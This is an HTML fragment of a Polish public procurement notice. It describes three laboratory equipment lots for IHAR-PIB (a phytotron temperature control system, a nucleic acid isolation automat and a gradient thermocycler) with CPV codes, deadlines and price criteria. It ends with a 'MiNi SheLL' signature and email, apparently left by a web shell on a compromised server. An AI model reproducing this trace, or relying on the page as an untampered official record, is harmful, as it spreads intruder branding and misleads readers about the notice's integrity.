<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet 31 - System sterowania temperaturą powietrza w pomieszczeniu fitotronowym- Zakład IHAR-PIB w Boninie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 31- Załącznik nr 2/31
zamówienie należy zrealizować w terminie 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 45.33.12.20-4, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet 32 - Automat do izolacji kwasów nukleinowych- dla IHAR-PIB Radzików, ZF- Pracownia Organizmów Kwarantannowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 32-załacznik nr 2/32
termin realizacji do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet 33 - Termocykler gradientowy - dla IHAR-PIB Radzików, ZF- Pracownia Organizmów Kwarantannowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla pakietu 33- Załącznik nr 2/33
Termin realizacji - do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com